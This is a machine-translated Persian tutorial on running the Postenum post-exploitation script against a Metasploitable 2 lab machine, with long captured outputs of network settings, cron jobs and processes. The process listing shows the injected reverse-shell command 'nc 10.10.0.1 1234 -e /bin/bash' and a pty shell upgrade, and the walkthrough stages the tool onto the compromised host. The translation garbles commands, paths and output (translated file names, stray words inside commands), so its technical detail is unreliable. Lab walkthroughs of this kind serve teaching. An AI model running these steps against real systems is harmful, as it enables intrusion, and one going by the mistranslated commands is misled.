چگونه به استفاده از Postenum به جمع آوری اطلاعات حیاتی در دوران پس از بهره برداری

پس از بهره برداری است که اغلب نه کاملا به عنوان هیجان انگیز به عنوان ظاهر اولیه پوسته, اما آن را یک فاز مهم برای جمع آوری داده ها و بیشتر privilege escalation. هنگامی که یک هدف است که به خطر بیافتد وجود دارد مقدار زیادی از اطلاعات برای پیدا کردن و غربال کردن از طریق. خوشبختانه وجود دارد ابزار در دسترس است که می تواند این فرایند را آسان. یکی از این ابزار است Postenum.

برای نشان دادن همه چیز Postenum را ارائه کرده است پس از بهره برداری ما با استفاده از Kali Linux به عنوان یک ماشین محلی است. همانطور که برای هدف قرار دادن اگر شما می خواهید به دنبال همراه و سعی کنید این ابزار به عنوان یک کلاه سفید و یا دستگاه نفوذ Metasploitable 2 خوب است عمدا آسیب پذیر ماشین مجازی استفاده کنید.

فاز 1: اولیه سازش

قبل از ما می توانید با استفاده از Postenum ما اول باید بهره برداری مورد نظر و دریافت یک پوسته. ما می توانیم با استفاده از تزریق دستور به اجرای سیستم عامل دستورات در سرور و سوء استفاده از قابلیت های آن به یک معکوس پوسته.

ما همچنین می خواهید به روز رسانی جدید ما پوسته به طور کامل تعاملی یکی. که آن را آسان تر به کار به طور کلی و همچنین به ما اجازه استفاده از برگه تکمیل و ترمینال تاریخ است. و ما فرض می کنیم هدف محدود اتصال به اینترنت, بنابراین ما نیاز به پیدا کردن یک راه برای انتقال Postenum از ما یک ماشین محلی است.

اول گرفتن اسکریپت از GitHub با wget فرمان:

~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh --2020-06-18 16:14:29-- https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
حل و فصل raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
اتصال به raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... متصل می شود.
درخواست HTTP ارسال و در انتظار پاسخ... 200 OK
طول: 56110 (55 K) [متن/ساده]
صرفه جویی به: 'postenum.sh' postenum.sh 100%[======================>] 54.79 K --.-KB/s در 0.07 s 2020-06-18 16:14:29 (749 KB/s) - 'postenum.sh' saved [56110/56110]

ما می توانید شروع به یک سرور ساده با استفاده از Python برای خدمت به این فایل بیش HTTP:

~ # , fuzzy, python-m SimpleHTTPServer خدمت HTTP 0.0.0.0 پورت 8000 ...

به عقب بر روی سیستم هدف اجازه می دهد تا حرکت به قابل نوشتن دایرکتوری بنابراین ما می توانید با دانلود و اجرای اسکریپت:

هدف:/var/آسیب پذیری/exec$ cd /var/tmp/ هدف:/var/tmp$

گرفتن فایل ما میزبانی وب در دستگاه ما مراقبت برای استفاده مناسب از IP آدرس:

هدف:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh --16:16:24-- http://10.10.0.1:8000/postenum.sh => `postenum.sh'
اتصال به 10.10.0.1:8000... متصل می شود.
درخواست HTTP ارسال و در انتظار پاسخ... 200 OK
طول: 43,831 (43K) [متن/x-sh] 100%[=================================================================================================================================================================================================>] 43,831 --.--K/s 16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]

ما باید ببینید که در آن درخواست سرور ما در حال اجرا است اگر همه چیز با موفقیت انجام شد:

خدمت HTTP 0.0.0.0 پورت 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -

و ما می توانیم با کشتن این در حال حاضر که ما با انتقال اسکریپت. اگر ما لیست محتویات دایرکتوری خواهیم دید که این اسکریپت نیست هنوز اجرایی:

هدف:/var/tmp$ ls -la مجموع 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 May 17 سال 2010 ..
-rw-r--r-- 1 www-data www-data 43831 Jun 18 سال 2020 postenum.sh

استفاده از سطح دسترسی فرماندهی آن را اجرایی:

هدف:/var/tmp$ chmod +x postenum.sh

و ما باید ببینیم که این شرکت قادر به اجرای:

هدف:/var/tmp$ ls -la مجموع 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 May 17 سال 2010 ..
-rw-r--r-- 1 www-data www-data 43831 Jun 18 سال 2020 postenum.sh

برای اجرای آن به سادگی استفاده از نقطه بریده بریده برای باش اسکریپت:

هدف:/var/tmp$ ./postenum.sh -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum استفاده > ./postenum.sh <option> گزینه ها > -a : همه -s : فایل سیستم [SUID, SGID پیکربندی/فایل DB و غیره.] -l : پوسته فرار و ابزار توسعه -c : جالب ترین فایل های -n : تنظیمات شبکه -p : خدمات و cron jobs -o : OS اطلاعات و priv esc سوء استفاده -v : نرم افزار نسخه -t : Fstab اعتبار و پایگاه داده های جستجوگر

که به ما کمی خوب بنر و استفاده برخی از گزینه های.

فاز 2: تنظیمات شبکه

گزینه اول ما پوشش جمع آوری خواهد شد, شبکه اطلاعات و تنظیمات. با استفاده از n- سوئیچ به آن لگد کردن:

هدف:/var/tmp$ ./postenum.sh -n -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] برقراری ارتباط و شبکه
[+] - چک NIC(s) آیا سیستم باید
[x] در دسترس رابط های شبکه در سیستم:
# این فایل توصیف رابط های شبکه موجود بر روی سیستم شما
# و چگونه به آنها را فعال کنید. برای اطلاعات بیشتر, ببینید رابط(5). # Loopback رابط شبکه
auto lo
iface lo inet loopback # اولیه رابط شبکه
auto eth0
iface eth0 inet static آدرس 10.10.0.50 netmask 255.255.255.0 دروازه 10.10.0.1 [x] میزبان:
127.0.0.1 localhost
127.0.1.1 هدف است.localdomain هدف # زیر خطوط مطلوب برای IPv6 قادر به میزبان
::1 ip6-localhost ip6-پرونده
را fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts [+] - بررسی تنظیمات شبکه
[x] نام DNS سرور:
جستجو localdomain
nameserver 172.16.1.1 [x] شبکه:
# نمادین نام شبکه های, دیدن شبکه های(5) برای اطلاعات بیشتر
لینک های محلی 169.254.0.0 [x] hostname:
هدف [x] دریافت DNS دامنه یا FQDN:
localdomain [+] - بررسی کاربران و میزبان برقراری ارتباط با سیستم
[x] نمایش تمام TCP/UDP وصل سوکت PID/برنامه:
فعال قابلیت اتصال به اینترنت (سرور و تاسیس)
نیا زده خورده تفاضل-س-ارسال-Q Local Address Foreign Address State PID/نام برنامه
tcp 0 0 0.0.0.0:512 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:513 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:514 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:41801 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:139 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:111 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:80 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:47536 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:21 0.0.0.0:* گوش دادن -
tcp 0 0 10.10.0.50:53 0.0.0.0:* گوش دادن -
tcp 0 0 127.0.0.1:53 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:44182 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:23 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:25 0.0.0.0:* گوش دادن -
tcp 0 0 127.0.0.1:953 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:445 0.0.0.0:* گوش دادن -
tcp 0 0 0.0.0.0:51902 0.0.0.0:* گوش دادن -
tcp 0 0 10.10.0.50:34846 10.10.0.1:1234 تاسیس 4789/باش
tcp6 0 0 :::2121 :::* گوش -
tcp6 0 0 :::3632 :::* گوش -
tcp6 0 0 :::53 :::* گوش -
tcp6 0 0 :::22 :::* گوش -
tcp6 0 0 :::5432 :::* گوش -
tcp6 0 0 ::1:953 :::* گوش -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 10.10.0.50:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.0.50:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 127.0.0.1:47783 127.0.0.1:47783 تاسیس -
udp 0 0 0.0.0.0:36136 0.0.0.0:* -
udp 0 0 0.0.0.0:945 0.0.0.0:* -
udp 0 0 10.10.0.50:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:52929 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 0.0.0.0:40927 0.0.0.0:* -
udp 0 0 0.0.0.0:55275 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::53 :::* -
udp6 0 0 :::50653 :::* - [x] لیست فایل های خود را بر اساس آدرس اینترنتی:
فرمان PID کاربر FD نوع دستگاه اندازه NODE NAME
باش 4789 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (تاسیس)
باش 4789 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (تاسیس)
python 4797 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (تاسیس)
python 4797 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (تاسیس) [x] آخرین ورود کاربران:
root pts/0 :0.0 Wed Jun 17 13:22 هنوز وارد
راه اندازی مجدد سیستم بوت 2.6.24-16-سرور Wed Jun 17 13:21 - 13:43 (00:21)
msfadmin tty1 Wed Jun 17 15:40 - پایین (00:00)
msfadmin tty1 Wed Jun 17 15:40 - 15:40 (00:00) wtmp آغاز می شود Wed Jun 18 15:38:50 سال 2020 [x] که وارد شده است و آنچه آنها انجام می دهند: 13:43:00 تا 22 min, 1 user load average: 0.02, 0.04, 0.07
کاربر TTY از ورود@ بیکار JCPU PCPU چه
root pts/0 :0.0 13:22 21:03m 0.05 s 0.05 s -باش [+] - بررسی ذخیره سازی IP و یا MAC آدرس

ما می توانید آن را به ما می دهد یک دسته از اطلاعات شروع با در دسترس رابط های شبکه و نام و آدرس. سپس آن را به ما نشان می دهد برخی از اطلاعات DNS و هر نمادین نام برای شبکه. در نهایت آن را به ما نشان می دهد میزبان کاربران و برقراری ارتباط با سیستم توسط کاربران وارد شده و اطلاعات مربوطه.

فاز 3: خدمات & Cron Jobs

گزینه بعدی ما را در کشف خواهد شد در حال اجرا خدمات و هر cron jobs که در حال حاضر بر روی سیستم. استفاده از -p سوئیچ برای این:

هدف:/var/tmp$ ./postenum.sh -p -------------------------------------------------------------------------- _ _ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | نسخه : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_| پس از شمارش توسط mbahadou
-------------------------------------------------------------------------- postenum - بود ریشه برای کمک و یا گزارش مسائل بازدید https://github.com/mbahadou/postenum [-] نرم افزار و خدمات
[+] - بررسی شغل برنامه ریزی شده
[x] جستجو در cron در /و غیره:
drwxr-xr-x 2 root root 4096 Jul 5 سال 2018 cron.d
drwxr-xr-x 2 root root 4096 May 28 2010 cron.روزانه
drwxr-xr-x 2 root root 4096 May 16 2010 cron.ساعتی
drwxr-xr-x 2 root root 4096 May 28 2010 cron.ماهانه
drwxr-xr-x 2 root root 4096 May 16 2010 cron.هفتگی
-rw-r--r-- 1 root root 724 May 8 2008 crontab [x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-مشترک [x] ریشه را cron jobs:
هیچ crontab برای www-data [x] محتوای فایل /etc/crontab:
# /etc/crontab: system-wide crontab
# بر خلاف هر گونه دیگر crontab شما لازم نیست که برای اجرای `crontab'
# فرمان به نصب نسخه جدید هنگامی که شما با ویرایش این فایل
# و فایل ها در /etc/cron.d. این فایل ها همچنین باید نام کاربری زمینه
# که هیچ یک از دیگر crontabs انجام دهد. پوسته=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom دوشنبه داو کاربر فرمان
17 * * * * root cd / && run-parts --report /etc/cron.ساعتی
25 6 * * * root test-x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.روزانه )
47 6 * * 7 root test-x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.هفتگی )
52 6 1 * * root test-x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.ماهانه )
# [x] مشاهده daily cron jobs:
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 سال 2008 مناسب
-rwxr-xr-x 1 root root 314 May 4 2008 استعداد
-rwxr-xr-x 1 root root 502 Dec 12 سال 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 17 سال 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 سال 2008 مرد-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 May 8 2008 استاندارد
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55 [x] نمایش ماهانه cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20 سال 2008 proftpd
-rwxr-xr-x 1 root root 129 May 8 2008 استاندارد [x] نمایش هفتگی cron jobs:
-rwxr-xr-x 1 root root 528 Mar 12 سال 2008 مرد-db
-rwxr-xr-x 1 root root 2522 28 Jan 2008 محبوبیت-مسابقه
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd [+] - برای چک کردن در حال اجرا خدمات و کدام خدمات(ع) در حال اجرا شده است و توسط ریشه
[x] نمایش هر پردازش در سیستم:
کاربر PID %CPU %MEM VSZ RSS TTY آمار زمان شروع فرمان
ریشه 1 0.1 0.6 2844 1696 ? اس اس 13:20 0:01 /sbin/init
ریشه 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
ریشه 3 0.0 0.0 0 0 ? S< 13:20 0:00 [مهاجرت/0]
ریشه 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
ریشه 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
ریشه 6 0.0 0.0 0 0 ? S< 13:20 0:00 [حوادث/0]
ریشه 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
ریشه 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
ریشه 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
ریشه 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
ریشه 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
ریشه 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
ریشه 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
ریشه 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
ریشه 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
ریشه 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
ریشه 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
ریشه 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
ریشه 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
ریشه 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
ریشه 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
ریشه 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
ریشه 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
ریشه 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
ریشه 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
ریشه 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
ریشه 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
daemon 3717 0.0 0.2 1836 524 ? اس اس 13:21 0:00 /sbin/portmap
statd 3737 0.0 0.2 1900 728 ? اس اس 13:21 0:00 /sbin/rpc.statd
ریشه 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
ریشه 3758 0.0 0.2 3648 564 ? اس اس 13:21 0:00 /usr/sbin/rpc.idmapd
ریشه 3985 0.0 0.1 1716 488 tty4 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty4
ریشه 3986 0.0 0.1 1716 492 tty5 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty5
ریشه 3990 0.0 0.1 1716 488 tty2 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty2
ریشه 3993 0.0 0.1 1716 492 tty3 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty3
ریشه 3996 0.0 0.1 1716 488 tty6 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty6
syslog 4034 0.0 0.2 1936 648 ? اس اس 13:21 0:00 /sbin/syslogd -u syslog
ریشه 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 اگر /proc/kmsg از /var/run/klogd/kmsg
klog 4071 0.0 0.8 3152 2052 ? اس اس 13:21 0:00 /sbin/klogd -P /var/run/klogd/kmsg
اتصال 4094 0.0 3.0 35408 7676 ? Ssl 13:21 0:00 /usr/sbin/نام -u اتصال
ریشه 4116 0.0 0.3 5312 996 ? اس اس 13:21 0:00 /usr/sbin/, sshd,
ریشه 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid file=/var/run/mysqld/mysqld.pid --skip-خارجی-قفل --port=3306 --سوکت=/var/run/mysqld/mysqld.جوراب
ریشه 4236 0.0 0.2 1700 556 ? S 13:21 0:00 چوب -p daemon.err -t mysqld_safe -i-t mysqld
postgres 4323 0.1 1.9 41340 5068 ? S 13:21 0:01 /usr/lib/mysql/8.3/bin/postgres -D /var/lib/mysql/8.3/اصلی -c config_file=/etc/mysql/8.3/main/postgresql.conf
postgres 4326 0.2 0.5 41340 1376 ? اس اس 13:21 0:03 postgres: نویسنده روند
postgres 4327 0.2 0.4 41340 1188 ? اس اس 13:21 0:03 postgres: وال نویسنده روند
postgres 4328 0.0 0.5 41476 1432 ? اس اس 13:21 0:01 postgres: autovacuum launcher روند
postgres 4329 0.0 0.4 12660 1172 ? اس اس 13:21 0:00 postgres: آمار جمع آوری فرایند
daemon 4349 0.0 0.1 2316 424 ? SNs 13:21 0:00 distccd --daemon-کاربر daemon --اجازه می دهد 0.0.0.0/0
daemon 4350 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon-کاربر daemon --اجازه می دهد 0.0.0.0/0
ریشه 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
ریشه 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
ریشه 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
ریشه 4412 0.0 0.1 2424 332 ? اس اس 13:21 0:00 /usr/sbin/rpc.mountd
daemon 4437 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon-کاربر daemon --اجازه می دهد 0.0.0.0/0
daemon 4479 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon-کاربر daemon --اجازه می دهد 0.0.0.0/0
ریشه 4480 0.0 0.6 5412 1728 ? اس اس 13:21 0:00 /usr/lib/postfix/استاد
postfix 4484 0.0 0.6 5420 1644 ? S 13:21 0:00 وانت -l -t fifo -u -c
postfix 4485 0.0 0.6 5460 1688 ? S 13:21 0:00 qmgr -l -t fifo -u
ریشه 4487 0.0 0.4 5388 1204 ? اس اس 13:21 0:00 /usr/sbin/nmbd -D
ریشه 4489 0.0 0.5 7724 1364 ? اس اس 13:21 0:00 /usr/sbin/smbd -D
ریشه 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
ریشه 4508 0.0 0.3 2424 856 ? اس اس 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 4545 0.0 0.6 9948 1592 ? اس اس 13:21 0:00 proftpd: (پذیرش اتصالات)
daemon 4559 0.0 0.1 1984 424 ? اس اس 13:21 0:00 /usr/sbin/atd
ریشه 4570 0.0 0.3 2104 896 ? اس اس 13:21 0:00 /usr/sbin/cron
ریشه 4598 0.0 0.1 2052 348 ? اس اس 13:21 0:00 /usr/bin/jsvc -کاربر tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.بی سر=true-Xmx128M -Djava.تایید شده.dirs=/usr/share/tomcat5.5/common/تایید -Dcatalina.پایه=/var/lib/tomcat5.5-Dcatalina.صفحه اصلی=/usr/share/tomcat5.5-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.امنیتی است.مدیر -Djava.امنیتی است.سیاست=/var/lib/tomcat5.5/conf/کاتالینا.سیاست org.آپاچی.کاتالینا.هنگام راه اندازی.بوت استرپ
ریشه 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -کاربر tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.بی سر=true-Xmx128M -Djava.تایید شده.dirs=/usr/share/tomcat5.5/common/تایید -Dcatalina.پایه=/var/lib/tomcat5.5-Dcatalina.صفحه اصلی=/usr/share/tomcat5.5-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.امنیتی است.مدیر -Djava.امنیتی است.سیاست=/var/lib/tomcat5.5/conf/کاتالینا.سیاست org.آپاچی.کاتالینا.هنگام راه اندازی.بوت استرپ
tomcat55 4601 5.3 44.8 389632 114652 ? Sl 13:21 1:12 /usr/bin/jsvc -کاربر tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.بی سر=true-Xmx128M -Djava.تایید شده.dirs=/usr/share/tomcat5.5/common/تایید -Dcatalina.پایه=/var/lib/tomcat5.5-Dcatalina.صفحه اصلی=/usr/share/tomcat5.5-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.امنیتی است.مدیر -Djava.امنیتی است.سیاست=/var/lib/tomcat5.5/conf/کاتالینا.سیاست org.آپاچی.کاتالینا.هنگام راه اندازی.بوت استرپ
ریشه 4619 0.0 1.0 10596 2564 ? اس اس 13:21 0:00 /usr/sbin/apache2 -k شروع
www-data 4621 0.0 0.9 10728 2516 ? S 13:21 0:00 /usr/sbin/apache2 -k شروع
www-data 4624 0.0 0.9 10728 2492 ? S 13:21 0:00 /usr/sbin/apache2 -k شروع
www-data 4626 0.0 0.8 10596 2096 ? S 13:21 0:00 /usr/sbin/apache2 -k شروع
www-data 4628 0.0 0.9 10596 2436 ? S 13:21 0:00 /usr/sbin/apache2 -k شروع
www-data 4629 0.0 0.9 10728 2500 ? S 13:21 0:00 /usr/sbin/apache2 -k شروع
ریشه 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
ریشه 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 روبی /usr/sbin/druby_timeserver.rb
ریشه 4649 0.0 0.1 1716 488 tty1 اس اس+ 13:21 0:00 /sbin/گتی 38400 tty1
ریشه 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
ریشه 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0-desktop X -auth /root/.Xauthority -هندسه 1024x768 -عمق 24-rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
ریشه 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
ریشه 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -هندسه 80x24+10+10 -ls -عنوان X دسکتاپ
ریشه 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
ریشه 4704 0.0 0.6 2852 1544 pts/0 اس اس+ 13:22 0:00-باش
www-data 4759 0.0 0.7 10596 1956 ? S 13:23 0:00 /usr/sbin/apache2 -k شروع
www-data 4780 0.0 0.7 10596 1956 ? S 13:29 0:00 /usr/sbin/apache2 -k شروع
www-data 4787 0.0 0.5 3248 1460 ? S 13:29 0:00 sh -c پینگ -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data 4789 0.0 0.5 3248 1448 ? S 13:29 0:00 باش
www-data 4797 0.0 0.9 3960 2472 ? S 13:31 0:00 python -c واردات pty;pty.تخم ریزی("/bin/bash")
www-data 4798 0.0 0.7 3400 سال 1868 pts/1 اس 13:31 0:00 /bin/bash
www-data 4927 0.0 0.7 3644 1888 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4956 0.0 0.4 3616 1204 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4957 0.0 0.3 2364 932 pts/1 R+ 13:44 0:00 ps aux [x] روند باینری و مجوز:
692K -rwxr-xr-x 1 root root 686K Apr 14 2008 /bin/bash 48K -rwxr-xr-x 1 root root 48K May 4 2008 /bin/dd 0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> باش 16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/گتی 92K -rwxr-xr-x 1 root root 88K May 2008 11 /sbin/init 24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd 16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap 40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd 32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd 72K -rwxr-xr-x 1 root root 67K May 2008 11 /sbin/udevd 32K -rwxr-xr-x 1 root root 31K 21 مه 2007 /usr/bin/jsvc 0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry -> /etc/جایگزین/rmiregistry
1.4 M -rwx------ 1 ریشه ریشه 1.4 M 20 مه 2012 /usr/bin/unrealircd 28K -rwxr-xr-x 1 root root 28K Apr 18 سال 2008 /usr/lib/postfix/استاد
3.5 M -rwxr-xr-x 1 root root 3.5 M Mar 21 2008 /usr/lib/mysql/8.3/bin/postgres
